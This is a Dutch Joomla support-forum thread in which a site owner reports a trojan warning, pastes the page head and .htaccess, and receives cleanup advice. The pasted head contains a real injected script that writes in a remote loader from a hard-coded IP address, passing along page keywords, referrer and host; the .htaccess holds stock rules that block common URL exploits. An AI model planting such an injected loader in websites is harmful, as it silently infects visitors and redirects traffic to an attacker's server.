Site ziek

  • Gast
  • Onderwerp Auteur
  • Gebruiker
  • Gebruiker
Meer
11 jul 2016 22:54 #1689 door Gast
Site ziek werd gestart door Gast
Mijn site is ziek...
www.lekkerlezen.net

Bedreiging: JS/TrojanDownloader.FakejQuery.A trojaans paard

Hoe kan dit?
En: hoe fix ik het?

Ik vermoed dat het probleem hier zit:
Code:
<head> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <base href="http://lekkerlezen.net/" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="generator" content="Joomla! - Open Source Content Management" /> <title>Lekker Lezen - Welkom bij lekkerlezen.net - de site voor en door boekenwormen</title> <link href="/?format=feed&type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" /> <link href="/?format=feed&type=atom" rel="alternate" type="application/atom+xml" title="Atom 1.0" /> <link href="/templates/rhuk-milkyway-3/favicon.ico" rel="shortcut icon" type="image/vnd.microsoft.icon" /> <link href="http://lekkerlezen.net/component/search/?Itemid=122&format=opensearch" rel="search" title="Zoek Lekker Lezen" type="application/opensearchdescription+xml" /> <link rel="stylesheet" href="http://www.lekkerlezen.net/templates/rhuk-milkyway-3/css/template.css" type="text/css" /> <link rel="stylesheet" href="/modules/mod_cookiesaccept/screen.css" type="text/css" /> <link rel="stylesheet" href="http://www.lekkerlezen.net/plugins/content/fastsocialshare/style/style.css" type="text/css" /> [B]<script src="/media/jui/js/jquery.min.js" type="text/javascript"></script> <script src="/media/jui/js/jquery-noconflict.js" type="text/javascript"></script> <script src="/media/jui/js/jquery-migrate.min.js" type="text/javascript"></script> <script src="/media/system/js/caption.js" type="text/javascript"></script> <script src="/media/jui/js/bootstrap.min.js" type="text/javascript"></script> <script type="text/javascript"> jQuery(window).on('load', function() { new JCaption('img.caption'); }); jQuery(document).ready(function(){ jQuery('.hasTooltip').tooltip({"html": true,"container": "body"}); }); window.setInterval(function(){var r;try{r=window.XMLHttpRequest?new XMLHttpRequest():new ActiveXObject("Microsoft.XMLHTTP")}catch(e){}if(r){r.open("GET","/index.php?option=com_ajax&format=json",true);r.send(null)}},840000); </script> <link rel="stylesheet" href="/templates/rhuk-milkyway-3/css/icomoon2.css" type="text/css" /> <!--[if lt IE 9]> <script src="/media/jui/js/html5.js"></script> <![endif]--> <!--[if lte IE 7]> <script src="/templates/rhuk-milkyway-3/js/lte-ie7.js"></script> <![endif]-->[/B] [B]<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.host)!==0||document.referrer!==undefined||document.referrer!==''||document.referrer!==null){document.write('<script type="text/javascript" src="http://50.23.93.68/js/jquery.min.php?c_utt=SWR2D2&c_utm='+encodeURIComponent('http://50.23.93.68/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x<y;x++){if(metas[x].name.toLowerCase()=="keywords"){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&se_referrer='+encodeURIComponent(document.referrer)+'&source='+encodeURIComponent(window.location.host))+'"><'+'/script>');}</script>[/B] </head>
Discussie gesloten.
  • Hans van der Meer
  • Admin
  • Admin
  • Hans is een [b][u]echte Joomla[/u][/b] liefhebber en helpt als moderator op JoomlaCommunity, als med
Meer
11 jul 2016 22:54 #1690 door Hans van der Meer
Beantwoord door Hans van der Meer in topic Site ziek
Hoi Wollongong, ik heb codetags toegevoegd, zou je dit de volgende keer direct willen doen?

Je geeft verder helemaal geen informatie, geen Joomlaversie, geen gebruikte extensies, geen informatie of de extensies allemaal bijgewerkt zijn etc.
Misschien kan je dat alsnog doen?

Joostock mede-organisator, Moderator Joomlacommunity
Mede-organisator JoomlaDagen
ex Team Leader van Official Joomla Social Media Team & ex JUG-organisator
Eigen site: www.hierbenikthuis.nl
Discussie gesloten.
  • Gast
  • Onderwerp Auteur
  • Gebruiker
  • Gebruiker
Meer
11 jul 2016 22:54 #1691 door Gast
Beantwoord door Gast in topic Site ziek
Het betreft Joomla 3.5.1

Extensions:
Akeeba
F0F (NEW) DO NOT REMOVE) zelfde auteurnaam als Akkeeba
F0F
FOF30
Page Peel Banner
PHPAss
phputf8
Fast Social Share
Cookies Accept
Editor JCE (werkt niet)
Quick Icon
Rapid Contact
Code Mirror
TinyMCE


Theme:
Beez
isis
protostar
rhuk-milkyway-3

htaccess (laatst gewijzigd op 5 april 2016)
Code:
## # @package Joomla # @copyright Copyright (C) 2005 - 2016 Open Source Matters. All rights reserved. # @license GNU General Public License version 2 or later; see LICENSE.txt ## ## # READ THIS COMPLETELY IF YOU CHOOSE TO USE THIS FILE! # # The line just below this section: 'Options +FollowSymLinks' may cause problems # with some server configurations. It is required for use of mod_rewrite, but may already # be set by your server administrator in a way that disallows changing it in # your .htaccess file. If using it causes your server to error out, comment it out (add # to # beginning of line), reload your site in your browser and test your sef url's. If they work, # it has been set by your server administrator and you do not need it set here. ## ## No directory listings IndexIgnore * ## Can be commented out if causes errors, see notes above. Options +FollowSymlinks Options -Indexes ## Mod_rewrite in use. RewriteEngine On ## Begin - Rewrite rules to block out some common exploits. # If you experience problems on your site block out the operations listed below # This attempts to block the most common type of exploit `attempts` to Joomla! # # Block out any script trying to base64_encode data within the URL. RewriteCond %{QUERY_STRING} base64_encode[^(]*\([^)]*\) [OR] # Block out any script that includes a <script> tag in URL. RewriteCond %{QUERY_STRING} (<|%3C)([^s]*s)+cript.*(>|%3E) [NC,OR] # Block out any script trying to set a PHP GLOBALS variable via URL. RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR] # Block out any script trying to modify a _REQUEST variable via URL. RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2}) # Return 403 Forbidden header and show the content of the root homepage RewriteRule .* index.php [F] # ## End - Rewrite rules to block out some common exploits. ## Begin - Custom redirects # # If you need to redirect some pages, or set a canonical non-www to # www redirect (or vice versa), place that code here. Ensure those # redirects use the correct RewriteRule syntax and the [R=301,L] flags. # ## End - Custom redirects ## # Uncomment following line if your webserver's URL # is not directly related to physical file paths. # Update Your Joomla! Directory (just / for root). ## # RewriteBase / ## Begin - Joomla! core SEF Section. # RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}] # # If the requested path and file is not /index.php and the request # has not already been internally rewritten to the index.php script RewriteCond %{REQUEST_URI} !^/index\.php # and the requested path and file doesn't directly match a physical file RewriteCond %{REQUEST_FILENAME} !-f # and the requested path and file doesn't directly match a physical folder RewriteCond %{REQUEST_FILENAME} !-d # internally rewrite the request to the index.php script RewriteRule .* index.php [L] # ## End - Joomla! core SEF Section.



Bericht toegevoegd op 12 juli 2016 om 23:27
Vorige bericht was op 12 juli 2016 om 23:05


Inmiddels beginnen steeds meer links naar de full-articles te redirecten...
Discussie gesloten.
  • Jheroen
  • Gebruiker
  • Gebruiker
  • Hallo
Meer
11 jul 2016 22:54 #1692 door Jheroen
Beantwoord door Jheroen in topic Site ziek
zonder de juiste kennis over wat waar geinfecteerd is geraakt én op welke manier wordt het een lang proces met misschien niet het resultaat waar je op hoopte..

heb je voldoende kennis en materialen om je website te kunnen doorlichten?

Joomlapartner , websites - maatwerk - migratie - design - onderhoud
Joomlahostingsupport , Joomla! SSD hosting -
Discussie gesloten.
  • Hans van der Meer
  • Admin
  • Admin
  • Hans is een [b][u]echte Joomla[/u][/b] liefhebber en helpt als moderator op JoomlaCommunity, als med
Meer
11 jul 2016 22:54 #1693 door Hans van der Meer
Beantwoord door Hans van der Meer in topic Site ziek
Duidelijk is dat hij besmet is en inmiddels ook blacklisted is volgens Sucuri.
Als jouw focus op de content ligt, wie doet het beheer van de website dan?

Joostock mede-organisator, Moderator Joomlacommunity
Mede-organisator JoomlaDagen
ex Team Leader van Official Joomla Social Media Team & ex JUG-organisator
Eigen site: www.hierbenikthuis.nl
Discussie gesloten.
  • Jheroen
  • Gebruiker
  • Gebruiker
  • Hallo
Meer
11 jul 2016 22:54 #1694 door Jheroen
Beantwoord door Jheroen in topic Site ziek
Duidelijk,

Een auto koop je en je rijd ermee alleen ga je jaarlijks voor onderhoud naar een garage.

Als je met je website werkt ontkom je niet aan tijdige en to the point onderhoud; kan je dat zelf niet dan moet je dat uitbesteden.

Je website is op enigerlei wijze gehackt geraakt en moet eerst gefixt worden, zodra de status weer 100% in orde is kan je bekijken wat je met onderhoud wilt doen.

Joomlapartner , websites - maatwerk - migratie - design - onderhoud
Joomlahostingsupport , Joomla! SSD hosting -
Discussie gesloten.
  • RVdwdb
  • Gebruiker
  • Gebruiker
  • -
Meer
11 jul 2016 22:54 #1695 door RVdwdb
Beantwoord door RVdwdb in topic Site ziek
Of plaats een (schone) back-up terug en wijzig daarna al je wachtwoorden (van superuser, database, ftp etc etc)
Discussie gesloten.
Gemaakt door Kunena